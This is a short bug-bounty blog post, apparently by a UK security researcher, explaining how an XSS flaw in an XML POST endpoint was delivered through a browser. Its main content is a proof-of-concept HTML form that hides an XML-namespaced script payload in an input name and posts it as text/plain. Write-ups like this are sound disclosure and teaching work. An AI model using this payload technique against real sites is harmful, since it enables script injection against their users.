@zseano
UK Security Researcher



A site containing various blog posts, tutorials, tools and information regarding working with me.

@zseano
UK Security Researcher



A site containing various blog posts, tutorials, tools and information regarding working with me.



Tutorials Blog Posts Tools Contact Information



XML XSS via POST

Read more blogs on BugBountyForum

I was bug hunting on a site which looked like this:

POST /snip/snippet.php HTTP/1.1
<?xml version="1.0"?>xml_here

I tested in BURP for XSS in XML, and it worked. Now I have to get this to work via a browser. I was a bit stuck of sending XML in a HTML form POST and google didn’t yeild me any results, but I worked out how. Below is my PoC:
<html>
	   <body>
	      <html> <body> <form ENCTYPE="text/plain" action="http://vulnsite.com/snip/snippet.php" method="post"> 
	      <input type="hidden" name="<foo> <html xmlns:html='http://www.w3.org/1999/xhtml'> <html:script>alert(1);</html:script> </html> </foo>">
	       <input type="submit" value="submit"> </form>
	   </body>
	</html>
	

Upon pressing “Submit”, the XSS in the XML is sent, and executes. And there we have it.. XSS in a XML post via a HTML form. Turns out adding the input name as the XSS will allow it to be executed. Note: Turns out all endpoints on the target site are vulnerable to this.. they’re going to have fun patching this. ;)